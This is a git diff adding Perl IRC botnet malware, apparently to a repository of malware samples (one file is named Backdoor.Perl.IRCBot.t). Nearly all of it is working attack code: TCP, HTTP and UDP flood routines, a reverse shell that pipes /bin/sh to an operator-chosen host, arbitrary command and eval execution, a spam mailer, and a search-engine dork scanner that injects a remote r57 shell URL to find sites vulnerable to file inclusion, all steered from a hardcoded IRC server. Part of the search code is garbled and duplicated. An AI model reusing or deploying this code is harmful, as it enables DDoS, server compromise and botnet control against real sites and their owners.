||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# TCPFlood # +# # +###################### + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4TCP DDos12:.4|12 Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); +} +sendraw($IRC_cur_socket,"PRIVMSG $printl :4|12.:4TCP DDos12:.4| 12Attack done 4 ".$1.":".$2."."); +} +###################### +# End of TCPFlood # +# # +###################### +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# Back Connect # +# # +###################### +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { +my $host = "$1"; +my $porta = "$2"; +my $proto = getprotobyname('tcp'); +my $iaddr = inet_aton($host); +my $paddr = sockaddr_in($porta, $iaddr); +my $shell = "/bin/sh -i"; +if ($^O eq "MSWin32") { + $shell = "cmd.exe"; +} +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; +connect(SOCKET, $paddr) or die "connect: $!"; +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system("$shell"); +close(STDIN); +close(STDOUT); +close(STDERR); +if ($estatisticas) +{ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4BackConnect12:.4|12 Connecting to 4 $host:$porta"); +} +} +###################### +#End of Back Connect# +# # +###################### +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# MULTI SCANNER # +# # +###################### +if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +### Start Message +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Starting Scan for 4$bug 12$dork"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Please wait while making Search Engines ready, this can take a while so be patient "); +### End of Start Message +# Starting Google + my @glist=&google($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 12G4o8o12g9l4e4 ".scalar(@glist)." 12Sites"); +# + my @mlist=&msn($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7M4S7N4 ".scalar(@mlist)." 12Sites"); +# + my @allist=&alltheweb($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7All7The7Web4 ".scalar(@allist)." 12Sites"); +# + my @asklist=&ask($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 14A4S14K4 ".scalar(@asklist)." 12Sites"); +# + my @aollist=&aol($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 7AOL4 ".scalar(@aollist)." 12Sites"); +# + my @lycos=&lycos($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 1L7yc1o7s4 ".scalar(@lycos)." 12Sites"); +# + my @ylist=&yahoo($dork); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 13Y6ahoo4 ".scalar(@ylist)." 12Sites"); +# +push(my @tot, @glist, @mlist, @alist, @allist, @asklist, @aollist, @lycos, @ylist ); +my @puliti=&unici(@tot); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Total Results:4 ".scalar(@tot)." 12Sites and Cleaned:4 ".scalar(@puliti)." 12for 2 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %30==0){ +#sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4|12 Exploiting4 ".$contatore." 12of4 ".$uni. " 12Sites"); +} +if ($contatore==$uni-1){ +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Scan12:.4| Finished for2 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 4OFF12:.4|12 12Vuln: 4$print "); +sendraw($IRC_cur_socket, "PRIVMSG putr4 :4|12.:4Safe Mode = 4OFF12:.4|12 12Vuln: 4$print "); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Safe Mode = 3ON12:.4|12 12Vuln: 4$print "); +}} +}}} +exit; +}}} +###################### +#End of MultiSCANNER # +# # +###################### +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +# RESERVED xD +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# HTTPFlood # +# # +###################### +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds ."); +my $itime = time; +my ($cur_time); +$cur_time = time - $itime; +while ($2>$cur_time){ +$cur_time = time - $itime; +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4HTTP DDos12:.4|12 Attacking done 4 ".$1."."); +} +###################### +# End of HTTPFlood # +# # +###################### +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# MAILER # +# # +###################### +# For mailing use : +# !bot @sendmail <subject> <sender> <recipient> <message> +# +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Sending Mail to :2 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Mail Sended To :2 $recipient"); +} +###################### +# End of MAILER # +# # +###################### +###################### +# UDPFlood # +# # +###################### +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds."); +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); +$dtime = 1 if $dtime == 0; +my %bytes; +$bytes{igmp} = $2 * $pacotes{igmp}; +$bytes{icmp} = $2 * $pacotes{icmp}; +$bytes{o} = $2 * $pacotes{o}; +$bytes{udp} = $2 * $pacotes{udp}; +$bytes{tcp} = $2 * $pacotes{tcp}; +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4UDP DDos12:.4|12 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1."."); +} +exit; +} +} +###################### +# End of Udpflood # +# # +###################### + + +sub ircase { +my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } +if ($case =~ /^rejoin\s+(.*)/) { +my $chan = $1; +if ($chan =~ /^(\d+) (.*)/) { +for (my $ca = 1; $ca <= $1; $ca++ ) { +p("$2"); +j("$2"); +} +} +else { +p("$chan"); +j("$chan"); +} +} + +if ($case =~ /^op/) { +op("$printl", "$kem") if $case eq "op"; +my $oarg = substr($case, 3); +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^deop/) { +deop("$printl", "$kem") if $case eq "deop"; +my $oarg = substr($case, 5); +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { +msg("$1", "$2"); +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +msg("$2", "$3"); +} +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { +ctcp("$1", "$2"); +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +ctcp("$2", "$3"); +} +} + +if ($case =~ /^nick (.*)/) { +nick("$1"); +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { +conectar("$2", "$1", 6667); +} + +if ($case =~ /^raw (.*)/) { +sendraw("$1"); +} + +if ($case =~ /^eval (.*)/) { +eval "$1"; +} +} + + +sub shell { +my $printl=$_[0]; +my $comando=$_[1]; +if ($comando =~ /cd (.*)/) { +chdir("$1") || msg("$printl", "No such file or directory"); +return; +} + +elsif ($pid = fork) { +waitpid($pid, 0); +} +else { +if (fork) { +exit; + +} else { +my @resp=`$comando 2>&1 3>&1`; +my $c=0; +foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } +} +exit; +} +} +} + +sub tcpflooder { +my $itime = time; +my ($cur_time); +my ($ia,$pa,$proto,$j,$l,$t); +$ia=inet_aton($_[0]); +$pa=sockaddr_in($_[1],$ia); +$ftime=$_[2]; +$proto=getprotobyname('tcp'); +$j=0;$l=0; +$cur_time = time - $itime; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +socket($t,PF_INET,SOCK_STREAM,$proto); +connect($t,$pa)||$j--; +$j++;$l++; +} +$l=0; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +shutdown($t,2); +$l++; +} +} + + + +sub udpflooder { +my $iaddr = inet_aton($_[0]); +my $msg = 'A' x $_[1]; +my $ftime = $_[2]; +my $cp = 0; +my (%pacotes); +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; +return(undef) if $cp == 4; +my $itime = time; +my ($cur_time); +while ( 1 ) { +for (my $porta = 1; +$porta <= 65000; $porta++) { +$cur_time = time - $itime; +last if $cur_time >= $ftime; +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { +next if $pc == 6; +$cur_time = time - $itime; +last if $cur_time >= $ftime; +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; +} +} +last if $cur_time >= $ftime; +} +return($cur_time, %pacotes); +} + +sub ctcp { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { +return unless $#_ == 1; +sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { +return unless $#_ == 1; +sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { +return unless $#_ == 1; +sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { +&join(@_); +} + +sub join { +return unless $#_ == 0; +sendraw("JOIN $_[0]"); + +} +sub p { part(@_); +} + +sub part { +sendraw("PART $_[0]"); +} + +sub nick { +return unless $#_ == 0; +sendraw("NICK $_[0]"); +} + +sub quit { +sendraw("QUIT :$_[0]"); +} + +sub fetch(){ +my $rnd=(int(rand(9999))); +my $n= 80; +if ($rnd<5000) { $n<<=1;} +my $s= (int(rand(10)) * $n); +{ +my @dominios = ("removed-them-all"); +my @str; +foreach $dom (@dominios) +{ +push (@str,"@gstring"); +} +my $query="www.google.com/search?q="; +$query.=$str[(rand(scalar(@str)))]; +$query.="&num=$n&start=$s"; +my @lst=(); +sendraw("privmsg #debug :DEBUG only test googling: ".$query.""); +my $page = http_query($query); +while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){ +if ($1 !~ m/google|cache|translate/){ +push (@lst,$1); +} +} +return (@lst); +} + + +sub yahoo(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=100){ +my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +sub lycos(){ +my $inizio=0; +my $pagine=20; +my $key=$_[0]; +my $av=0; +my @lst; +while($inizio <= $pagine){ +my $lycos="http://search.lycos.com/?query=".key($key)."&page=$av"; +my $Res=query($lycos); +while ($Res=~ m/<span class=\"?grnLnk small\"?>http:\/\/(.+?)\//g ){ +my $k="$1"; +my @grep=links($k); +push(@lst,@grep); +} +$inizio++; +$av++; +} +return @lst; +} + +##### +sub aol(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=100;$b++){ +my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} +##### +sub ask(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} +##### +sub alltheweb() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub google(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=100;$b+=100){ +my $Go=("http://www.goog){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=100;$b++){ +my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8"); +my $Res=query($AoL); +while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} +##### +sub ask(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} +##### +sub alltheweb() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub google(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=100;$b+=100){ +my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} +} + +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### + + diff --git a/Perl/Backdoor.Perl.IRCBot.t b/Perl/Backdoor.Perl.IRCBot.t new file mode 100644 index 00000000..f1bc1a86 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.t @@ -0,0 +1,1265 @@ +################################# +# MrNETi ## +# Author: Tc-Team.com ## +# TC-CREW production ## +# We Are: MrNETi ^ ColdFire ## +################################# + + +$process = "/sbin/mingetty tty1"; ## process +my $printcmd = "http://www.amdgchoir.com/gallery/r57.txt?"; ## r57;c99 shell +my $id = "http://landleben.bieswang.de/cache/id.txt??"; ## ID is private !! +my $spread = "?"; ## spread +my $ircserver = "irc.darksin.it"; ## ur irc server +my $start = "!scan"; ## command to start scan +my $port = "6667"; ## irc server port +my $nickname = "[o0o]" . int( rand(99) ) . ""; ## nickname +my $admin = "n4sty"; ## msg prv +my $channel = "#TeRmInAtOr"; ## chan +my $chanres = "#TeRmInAtOr"; ## channel print result +my $verz = "ATL // Fams"; + +print "\n"; +print " RFI Start !!\n"; +print " MrFams By pwn3d\n"; +print " Release $verz\n"; +print " Now join $ircserver:$port\n"; +print " $channel and $chanres\n"; +print " Fams Security Clan ;)\n\n"; + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; +require LWP; +$|++; + +my $pid = fork; +exit if $pid; +$0 = "$process" . "\0" x 16; +my $dsp = IO::Socket::INET->new( + PeerAddr => "$ircserver", + PeerPort => "$port", + Proto => "tcp" +) or die "Can not connect on server!\n"; +$dsp->autoflush(1); +print $dsp "NICK $nickname\r\n"; +print $dsp "USER Fams 8 * : &verz \r\n"; +print $dsp "JOIN $channel\r\n"; +print $dsp "PRIVMSG $channel :4!scan15 bug dork & 1!12G4o13o12g9l4e 15bug dork\r\n"; +sleep(1); +print $dsp "NICK $nickname\r\n"; +print $dsp "USER priv8 8 * : $verz \r\n"; +print $dsp "JOIN $chanres\r\n"; +print $dsp "PRIVMSG $chanres :4Alb-Team;)\r\n"; +print $dsp "PRIVMSG $chanres :4Created By KoRn\r\n"; +while ( $line = <$dsp> ) { + + $line =~ s/\r\n$//; + if ( $line =~ /^PING \:(.*)/ ) { + print "PONG :$1"; + print $dsp "PONG :$1"; + } + + if ( $line =~ /PRIVMSG $channel :!help/ ) { + sleep(1); + display( $dsp,"PRIVMSG $channel :7,12Good Luck .."); + display( $dsp,"PRIVMSG $channel :7Help !Scan bug dork & 1!12G4o8o12g9l4e 7bug dork"); + display( $dsp, + "PRIVMSG $channel :7 HelP Info?? Command is : !info" + ); + } + + if ( $line =~ /PRIVMSG $channel :!info/ ) { + my $sysos = `uname -sr`; + my $uptime = `uptime`; + if ( $sysos =~ /freebsd/i ) { + $sysname = `hostname`; + $memory = +`expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; + $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; + chomp($memory); + chomp($swap); + } + + elsif ( $sysos =~ /linux/i ) { + $sysname = `hostname -f`; + $memory = `free -m |grep -i mem | awk '{print \$2}'`; + $swap = `free -m |grep -i swap | awk '{print \$2}'`; + chomp($swap); + chomp($memory); + } + else { + $sysname = "No Found"; + $memory = "No found"; + $swap = "No Found"; + } + $uptime =~ s/\n//g; + $sysname =~ s/\n//g; + $sysos =~ s/\n//g; + sleep(1); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] G3o..."); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] IrcServer/Port: $ircserver - $port"); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] Hostname: $sysos "); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] Process/PID: $admin - $$"); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] Uptime: $uptime" ); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] Memory/Swap: $memory - $swap"); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] Admin:16 $admin"); + } + + if ( $line =~ /PRIVMSG $channel :!id/ ) + { ## йй Script made by princeteam1979 . Don't remove this comment ! + my $testid = $id; + my $req = HTTP::Request->new( GET => $testid ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /<\?php/ ) { + sleep(1); + display( $dsp,"PRIVMSG $channel :4,1Id Work"); + } + } + else { + sleep(1); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] ID Is Dead ..Scan OUT.!!!"); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] 7Scan OUT 10 secs!!"); + sleep(10); + display( $dsp,"PRIVMSG $channel :7[4I7nfo] Exiting..." ); + display( $dsp, "QUIT" ); + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + sleep(1); + display( $dsp,"PRIVMSG $channel :7,1Ok... Start 1,4 $dork"); + my @google = &googlet($dork); + push( my @tot, @google ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 12G4o4o12g9l4e 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 12G4o4o12g9l4e 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Result..."); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[12G4o4o12g9l4e4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[12G4o4o12g9l4e4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Result..."); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server 